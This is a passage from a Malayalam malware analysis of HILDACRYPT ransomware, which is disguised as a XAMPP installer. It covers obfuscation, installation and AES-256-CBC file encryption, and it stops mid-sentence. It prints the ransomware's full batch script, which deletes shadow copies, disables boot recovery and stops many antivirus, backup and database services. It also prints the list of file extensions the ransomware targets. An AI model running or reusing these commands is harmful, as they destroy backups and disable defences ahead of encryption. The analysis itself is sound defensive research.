เดนเดฒเต, เดนเดฌเตเตผ! Ransomware เดตเดฟเดญเดพเดเดคเตเดคเดฟเตฝ เดจเดฟเดจเตเดจเตเดณเตเดณ เดเตเดทเตเดฆเตเดฐเดตเตเดฏเดฑเดฟเดจเตเดฑเต เดเดฑเตเดฑเดตเตเด เดชเตเดคเดฟเดฏ เดชเดคเดฟเดชเตเดชเตเดเดณเตเดเตเดเตเดฑเดฟเดเตเดเดพเดฃเต เดเดเตเดเตพ เดตเตเดฃเตเดเตเด เดธเดเดธเดพเดฐเดฟเดเตเดเตเดจเตเดจเดคเต. 2019 เดเดเดธเตเดฑเตเดฑเดฟเตฝ เดเดฃเตเดเตเดคเตเดคเดฟเดฏ เดนเดฟเตฝเดก เดเตเดเตเดเดฌเดคเตเดคเดฟเดฒเต เด เดเดเดฎเดพเดฏ เดเดฐเต เดชเตเดคเดฟเดฏ ransomware เดเดฃเต HILDACRYPT, เดธเตเดซเตเดฑเตเดฑเตโเดตเตเดฏเตผ เดตเดฟเดคเดฐเดฃเด เดเตเดฏเตเดฏเดพเตป เดเดชเดฏเตเดเดฟเดเตเด เดจเตเดฑเตเดฑเตเดซเตเดฒเดฟเดเตเดธเต เดเดพเตผเดเตเดเตเดฃเดฟเดจเตเดฑเต เดชเตเดฐเดฟเดฒเดพเดฃเต เดเดคเต เด เดฑเดฟเดฏเดชเตเดชเตเดเตเดจเตเดจเดคเต. เดเดจเตเดจเต เดจเดฎเตเดฎเตพ เด เด เดชเตเดกเตเดฑเตเดฑเต เดเตเดฏเตเดค ransomware เดตเตเดฑเดธเดฟเดจเตเดฑเต เดธเดพเดเตเดเตเดคเดฟเด เดธเดตเดฟเดถเตเดทเดคเดเตพ เดชเดฐเดฟเดเดฏเดชเตเดชเตเดเตเดเดฏเดพเดฃเต.
เดนเดฟเตฝเดก ransomware-เดจเตเดฑเต เดเดฆเตเดฏ เดชเดคเดฟเดชเตเดชเดฟเตฝ, Youtube-เตฝ เดชเตเดธเตเดฑเตเดฑเตเดเตเดฏเตเดค เดเดจเตเดจเดฟเดฒเตเดเตเดเตเดณเตเดณ เดฒเดฟเดเตเดเต เดฎเตเดเดจเดฆเตเดฐเดตเตเดฏเดคเตเดคเดฟเตฝ เดเดพเตผเดเตเดเตเตบ เดชเดฐเดฎเตเดชเดฐ เดเดฃเตเดเดพเดฏเดฟเดฐเตเดจเตเดจเต. HILDACRYPT เดเดฐเต เดจเดฟเดฏเดฎเดพเดจเตเดธเตเดค XAMPP เดเตปเดธเตเดฑเตเดฑเดพเดณเดฑเดพเดฏเดฟ เดฎเดพเดฑเตเดจเตเดจเต, เดฎเดฐเดฟเดฏเดพเดกเดฟเดฌเดฟ, เดชเดฟเดเดเตเดเตเดชเดฟ, เดชเตเตพ เดเดจเตเดจเดฟเดต เดเตพเดชเตเดชเตเดเตเดจเตเดจ เดเดณเตเดชเตเดชเดคเตเดคเดฟเตฝ เดเตปเดธเตเดฑเตเดฑเดพเตพ เดเตเดฏเตเดฏเดพเดตเตเดจเตเดจ เด
เดชเตเดชเดพเดเตเดเต เดตเดฟเดคเดฐเดฃเดฎเดพเดฃเต. เด
เดคเต เดธเดฎเดฏเด, เดเตเดฐเดฟเดชเตโเดฑเตเดฑเตเดฒเตเดเตเดเดฑเดฟเดจเต เดฎเดฑเตเดฑเตเดฐเต เดซเดฏเตฝ เดจเดพเดฎเดฎเตเดฃเตเดเต - xamp. เดเตเดเดพเดคเต, ransomware เดซเดฏเดฒเดฟเดจเต เดเดฐเต เดเดฒเดเตเดเตเดฐเตเดฃเดฟเดเต เดธเดฟเดเตเดจเตเดเตเดเตผ เดเดฒเตเดฒ.
เดธเตเดฑเตเดฑเดพเดฑเตเดฑเดฟเดเต เดตเดฟเดถเดเดฒเดจเด
MS Windows-เดจเดพเดฏเดฟ เดเดดเตเดคเดฟเดฏ PE32 .NET เดซเดฏเดฒเดฟเดฒเดพเดฃเต ransomware เด เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเดคเต. เดเดคเดฟเดจเตเดฑเต เดตเดฒเดฟเดชเตเดชเด 135 เดฌเตเดฑเตเดฑเตเดเตพ เดเดฃเต. เดชเตเดฐเดงเดพเดจ เดชเตเดฐเตเดเตเดฐเดพเด เดเตเดกเตเด เดกเดฟเดซเตปเดกเตผ เดชเตเดฐเตเดเตเดฐเดพเด เดเตเดกเตเด C# เตฝ เดเดดเตเดคเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต. เดธเดฎเดพเดนเดฐเดฟเดเตเด เดคเตเดฏเดคเดฟเดฏเตเด เดธเดฎเดฏ เดธเตเดฑเตเดฑเดพเดฎเตเดชเตเด เด เดจเตเดธเดฐเดฟเดเตเดเต, เดฌเตเดจเดฑเดฟ เดธเตเดทเตเดเดฟเดเตเดเดคเต 168 เดธเตเดชเตเดฑเตเดฑเดเดฌเตผ 14-เดจเดพเดฃเต.
เดกเดฟเดฑเตเดฑเดเตเดฑเตเดฑเต เดเดฑเตเดฑเต เดเดธเดฟ เดชเตเดฐเดเดพเดฐเด, เดเตบเดซเตเดฏเตเดธเดฑเตเด เดเตบเดซเตเดฏเตเดธเตผเดเดเตเดธเตเด เดเดชเดฏเตเดเดฟเดเตเดเดพเดฃเต ransomware เดเตผเดเตเดเตเดตเต เดเตเดฏเตเดคเดฟเดฐเดฟเดเตเดเตเดจเตเดจเดคเต, เดเดจเตเดจเดพเตฝ เด obfuscators เดฎเตเดฎเตเดชเดคเตเดคเต เดชเตเดฒเต เดคเดจเตเดจเตเดฏเดพเดฃเต, ConfuserEx เดฎเดพเดคเตเดฐเดฎเดพเดฃเต เดเตบเดซเตเดฏเตเดธเดฑเดฟเดจเตเดฑเต เดชเดฟเตปเดเดพเดฎเดฟ, เด
เดคเดฟเดจเดพเตฝ เด
เดตเดฏเตเดเต เดเตเดกเต เดเดชเตเดชเตเดเตพ เดธเดฎเดพเดจเดฎเดพเดฃเต.
HILDACRYPT เดคเตเตผเดเตเดเดฏเดพเดฏเตเด ConfuserEx-เดจเตเดชเตเดชเด เดชเดพเดเตเดเตเดเตเดเตเดฏเตเดคเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
เดเดเตเดฐเดฎเดฃ เดตเตเดเตเดฑเตเดฑเตผ
เดฎเดฟเดเตเดเดตเดพเดฑเตเด, เดเดฐเต เดจเดฟเดฏเดฎเดพเดจเตเดธเตเดค XAMPP เดชเตเดฐเตเดเตเดฐเดพเดฎเดพเดฏเดฟ เดฎเตเดเดเดฎเตเดเดฟเดฏเดฃเดฟเดเตเดเต, เดตเตเดฌเต เดชเตเดฐเตเดเตเดฐเดพเดฎเดฟเดเดเต เดธเตเดฑเตเดฑเตเดเดณเดฟเดฒเตเดจเตเดจเดฟเตฝ ransomware เดเดฃเตเดเตเดคเตเดคเดฟ.
เด เดฃเตเดฌเดพเดงเดฏเตเดเต เดฎเตเดดเตเดตเตป เดถเตเดเดเดฒเดฏเตเด เดเดพเดฃเดพเตป เดเดดเดฟเดฏเตเด .
เด เดตเตเดฏเดเตเดคเดค
ransomware เดธเตเดเตเดฐเดฟเดเดเตเดเตพ เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดฐเตเดชเดคเตเดคเดฟเดฒเดพเดฃเต เดธเตเดเตเดทเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจเดคเต. เดธเดฎเดพเดฐเดเดญเดฟเดเตเดเตเดฎเตเดชเตเตพ, HILDACRYPT เด เดตเดฏเต Base64, AES-256-CBC เดเดจเตเดจเดฟเดต เดเดชเดฏเตเดเดฟเดเตเดเต เดกเตเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดฏเตเดจเตเดจเต.
เดเตปเดธเตเดฑเตเดฑเดฒเตเดทเตป
เดเดจเตเดจเดพเดฎเดคเดพเดฏเดฟ, ransomware %AppDataRoaming%-เตฝ เดเดฐเต เดซเตเตพเดกเตผ เดธเตเดทเตเดเดฟเดเตเดเตเดจเตเดจเต, เด เดคเดฟเตฝ GUID (เดเดเตเดณเดฎเดพเดฏเดฟ เดฏเตเดฃเตเดเตเดเต เดเดกเดจเตเดฑเดฟเดซเดฏเตผ) เดชเดพเดฐเดพเดฎเตเดฑเตเดฑเตผ เดเตเดฐเดฎเดฐเดนเดฟเดคเดฎเดพเดฏเดฟ เดเดจเดฑเตเดฑเตเดฑเตเดเตเดฏเตเดฏเตเดจเตเดจเต. เด เดฒเตเดเตเดเตเดทเดจเดฟเดฒเตเดเตเดเต เดเดฐเต เดฌเดพเดฑเตเดฑเต เดซเดฏเตฝ เดเตเตผเดเตเดเตเดจเตเดจเดคเดฟเดฒเตเดเต, ransomware เดตเตเดฑเดธเต cmd.exe เดเดชเดฏเตเดเดฟเดเตเดเต เด เดคเต เดธเดฎเดพเดฐเดเดญเดฟเดเตเดเตเดจเตเดจเต:
cmd.exe /c JKfgkgj3hjgfhjka.bat & เดเดเตเดธเดฟเดฑเตเดฑเต
เด
เดคเต เดชเดฟเดจเตเดจเตเดเต เดธเดฟเดธเตเดฑเตเดฑเด เดซเตเดเตเดเดฑเตเดเดณเต เดธเตเดตเดจเดเตเดเดณเต เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเดเตเดเดพเตป เดเดฐเต เดฌเดพเดเตเดเต เดธเตเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเดเตเดธเดฟเดเตเดฏเตเดเตเดเต เดเตเดฏเตเดฏเดพเตป เดคเตเดเดเตเดเตเดจเตเดจเต.
เดทเดพเดกเต เดชเดเตผเดชเตเดชเตเดเตพ เดจเดถเดฟเดชเตเดชเดฟเดเตเดเตเดจเตเดจ, SQL เดธเตเตผเดตเตผ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเดเตเดเตเดจเตเดจ, เดฌเดพเดเตเดเดชเตเดชเต, เดเดจเตเดฑเดฟเดตเตเดฑเดธเต เดธเตเดฒเตเดฏเตเดทเดจเตเดเตพ เดเดจเตเดจเดฟเดตเดฏเตเดเตเดเตเดณเตเดณ เดเดฎเดพเตปเดกเตเดเดณเตเดเต เดเดฐเต เดจเตเดฃเตเด เดฒเดฟเดธเตเดฑเตเดฑเต เดธเตเดเตเดฐเดฟเดชเตเดฑเตเดฑเดฟเตฝ เด
เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต.
เดเดฆเดพเดนเดฐเดฃเดคเตเดคเดฟเดจเต, เด เดเตเดฐเตเดฃเดฟเดธเต เดฌเดพเดเตเดเดชเตเดชเต เดธเตเดตเดจเดเตเดเตพ เดจเดฟเตผเดคเตเดคเดพเตป เดเดคเต เดชเดฐเดพเดเดฏเดชเตเดชเตเดเตเดเต. เดเตเดเดพเดคเต, เดเดจเดฟเดชเตเดชเดฑเดฏเตเดจเตเดจ เดตเตเดฃเตเดเตผเดฎเดพเดฐเดฟเตฝ เดจเดฟเดจเตเดจเตเดณเตเดณ เดฌเดพเดเตเดเดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเดเตเดเดณเตเดฏเตเด เดเดจเตเดฑเดฟเดตเตเดฑเดธเต เดธเตเดฒเตเดฏเตเดทเดจเตเดเดณเตเดฏเตเด เดเดคเต เดเดเตเดฐเดฎเดฟเดเตเดเตเดจเตเดจเต: เดตเตเด, เดธเตเดซเตเดธเต, เดเดพเดธเตโเดชเตเตผเดธเตโเดเดฟ, เดฎเดเตเดเดพเดซเต เดเดจเตเดจเดฟเดตเดฏเตเด เดฎเดฑเตเดฑเตเดณเตเดณเดตเดฏเตเด.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop โSophos Device Control Serviceโ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop โZoolz 2 Serviceโ /y
net stop McTaskManager /y
net stop โSophos AutoUpdate Serviceโ /y
net stop โSophos System Protection Serviceโ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop โSymantec System Recoveryโ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop โSophos Health Serviceโ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop โSophos Message Routerโ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop โSophos Clean Serviceโ /y
net stop swi_update_64 /y
net stop โSophos Web Control Serviceโ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop โVeeam Backup Catalog Data Serviceโ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop โSophos MCS Clientโ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop โSQLsafe Backup Serviceโ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop โSophos Safestore Serviceโ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop โSophos File Scanner Serviceโ /y
net stop โSophos Agentโ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop โEnterprise Client Serviceโ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop โSQL Backupsโ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop โSophos MCS Agentโ /y
net stop RESvc /y
net stop โAcronis VSS Providerโ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop โSQLsafe Filter Serviceโ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
เดฎเตเดเดณเดฟเตฝ เดธเตเดเดฟเดชเตเดชเดฟเดเตเด เดธเตเดตเดจเดเตเดเดณเตเด เดชเตเดฐเดเตเดฐเดฟเดฏเดเดณเตเด เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเดเตเดเดฟเดฏเดพเตฝ, เดเดตเดถเตเดฏเดฎเดพเดฏ เดเดฒเตเดฒเดพ เดธเตเดตเดจเดเตเดเดณเตเด เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเดฃเตเดจเตเดจเต เดเดฑเดชเตเดชเดพเดเตเดเดพเตป เดเดพเดธเตโเดเตโเดฒเดฟเดธเตเดฑเตเดฑเต เดเดฎเดพเตปเดกเต เดเดชเดฏเตเดเดฟเดเตเดเต เดชเตเดฐเดตเตผเดคเตเดคเดฟเดเตเดเตเดจเตเดจ เดเดฒเตเดฒเดพ เดชเตเดฐเดเตเดฐเดฟเดฏเดเดณเตเดฏเตเด เดเตเดฑเดฟเดเตเดเตเดณเตเดณ เดตเดฟเดตเดฐเดเตเดเตพ เดเตเดฐเดฟเดชเตโเดฑเตเดฑเตเดฒเตเดเตเดเตผ เดถเตเดเดฐเดฟเดเตเดเตเดจเตเดจเต.
เดเดพเดธเตโเดเตโเดฒเดฟเดธเตเดฑเตเดฑเต v/fo csv
เด เดเดฎเดพเตปเดกเต เดชเตเดฐเดตเตผเดคเตเดคเดฟเดเตเดเตเดจเตเดจ เดชเตเดฐเดเตเดฐเดฟเดฏเดเดณเตเดเต เดตเดฟเดถเดฆเดฎเดพเดฏ เดฒเดฟเดธเตเดฑเตเดฑเต เดชเตเดฐเดฆเตผเดถเดฟเดชเตเดชเดฟเดเตเดเตเดจเตเดจเต, เด
เดตเดฏเตเดเต เดเดเดเดเตเดเตพ "" เดเดฟเดนเตเดจเดคเตเดคเดพเตฝ เดตเตเตผเดคเดฟเดฐเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต.
ยซยซcsrss.exeยป,ยซ448ยป,ยซservicesยป,ยซ0ยป,ยซ1๏ฟฝ896 ๏ฟฝ๏ฟฝยป,ยซunknownยป,ยป๏ฟฝ/๏ฟฝยป,ยซ0:00:03ยป,ยป๏ฟฝ/๏ฟฝยปยป
เด เดชเดฐเดฟเดถเตเดงเดจเดฏเตเดเตเดเต เดถเตเดทเด, ransomware เดเตปเดเตเดฐเดฟเดชเตเดทเตป เดชเตเดฐเดเตเดฐเดฟเดฏ เดเดฐเดเดญเดฟเดเตเดเตเดจเตเดจเต.
เดเตปเดเตเดฐเดฟเดชเตเดทเตป
เดซเดฏเตฝ เดเตปเดเตเดฐเดฟเดชเตเดทเตป
HILDACRYPT, Recycle.Bin, Reference AssembliesMicrosoft เดซเตเตพเดกเดฑเตเดเตพ เดเดดเดฟเดเตเดฏเตเดณเตเดณ เดนเดพเตผเดกเต เดกเตเดฐเตเดตเตเดเดณเดฟเตฝ เดเดฃเตเดเตเดคเตเดคเดฟเดฏ เดเดฒเตเดฒเดพ เดเดณเตเดณเดเดเตเดเดเตเดเดณเดฟเดฒเตเดเตเดฏเตเด เดเดเดจเตเดจเตเดชเตเดเตเดจเตเดจเต. ransomware-เดจเตเดฑเต เดชเตเดฐเดตเตผเดคเตเดคเดจเดคเตเดคเต เดฌเดพเดงเดฟเดเตเดเตเดเตเดเดพเดตเตเดจเตเดจ .Net เดเดชเตเดฒเดฟเดเตเดเตเดทเดจเตเดเตพเดเตเดเดพเดฏเตเดณเตเดณ เดจเดฟเตผเดฃเดพเดฏเดเดฎเดพเดฏ dll, pdb เดฎเตเดคเดฒเดพเดฏเดต เดซเดฏเดฒเตเดเตพ เดฐเดฃเตเดเดพเดฎเดคเตเดคเตเดคเดฟเตฝ เด เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต. เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดฏเดชเตเดชเตเดเตเดจเตเดจ เดซเดฏเดฒเตเดเตพเดเตเดเดพเดฏเดฟ เดคเดฟเดฐเดฏเดพเตป, เดเดจเดฟเดชเตเดชเดฑเดฏเตเดจเตเดจ เดตเดฟเดชเตเดฒเตเดเดฐเดฃเดเตเดเดณเตเดเต เดฒเดฟเดธเตเดฑเตเดฑเต เดเดชเดฏเตเดเดฟเดเตเดเตเดจเตเดจเต:
ยซ.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.mdยป
เดเดชเดฏเตเดเตเดคเต เดซเดฏเดฒเตเดเตพ เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดฏเดพเตป ransomware AES-256-CBC เด
เตฝเดเตเดฐเดฟเดคเด เดเดชเดฏเตเดเดฟเดเตเดเตเดจเตเดจเต. เดเต เดตเดฒเตเดชเตเดชเด 256 เดฌเดฟเดฑเตเดฑเตเดเดณเตเด เดเดจเตเดทเตเดฏเดฒเตเดธเตเดทเตป เดตเตเดเตเดฑเตเดฑเตผ (IV) เดตเดฒเตเดชเตเดชเด 16 เดฌเตเดฑเตเดฑเตเดเดณเตเดฎเดพเดฃเต.
เดเดจเดฟเดชเตเดชเดฑเดฏเตเดจเตเดจ เดธเตเดเตเดฐเตเตปเดทเตเดเตเดเดฟเตฝ, GetBytes() เดเดชเดฏเตเดเดฟเดเตเดเต byte_2, byte_1 เดเดจเตเดจเดฟเดตเดฏเตเดเต เดฎเตเดฒเตเดฏเดเตเดเตพ เดเตเดฐเดฎเดฐเดนเดฟเดคเดฎเดพเดฏเดฟ เดฒเดญเดฟเดเตเดเต.
เดเต
ะะ
เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดซเดฏเดฒเดฟเดจเต HCY เดเดจเตเดจ เดเดเตเดธเตเดฑเตเดฑเตปเดทเตป เดเดฃเตเดเต!.. เดเดคเต เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดซเดฏเดฒเดฟเดจเตเดฑเต เดเดฐเต เดเดฆเดพเดนเดฐเดฃเดฎเดพเดฃเต. เดฎเตเดเดณเดฟเตฝ เดธเตเดเดฟเดชเตเดชเดฟเดเตเด เดเตเดฏเตเด IV-เดฏเตเด เด เดซเดฏเดฒเดฟเดจเดพเดฏเดฟ เดธเตเดทเตเดเดฟเดเตเดเดคเดพเดฃเต.
เดเต เดเตปเดเตเดฐเดฟเดชเตเดทเตป
เดเตเดฐเดฟเดชเตโเดฑเตเดฑเตเดฒเตเดเตเดเตผ เดเดจเดฑเตเดฑเตเดฑเตเดเตเดฏเตโเดค AES เดเต เดเดฐเต เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตโเดค เดซเดฏเดฒเดฟเตฝ เดธเดเดญเดฐเดฟเดเตเดเตเดจเตเดจเต. เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดซเดฏเดฒเดฟเดจเตเดฑเต เดเดฆเตเดฏ เดญเดพเดเดคเตเดคเดฟเดจเต HILDACRYPT, KEY, IV, XML เดซเตเตผเดฎเดพเดฑเตเดฑเดฟเดฒเตเดณเตเดณ FileLen เดชเตเดฒเตเดณเตเดณ เดกเดพเดฑเตเดฑ เด เดเดเตเดเตเดจเตเดจ เดเดฐเต เดคเดฒเดเตเดเตเดเตเดเตเดฃเตเดเต, เดเดคเตเดชเตเดฒเต เดเดพเดฃเดชเตเดชเตเดเตเดจเตเดจเต:
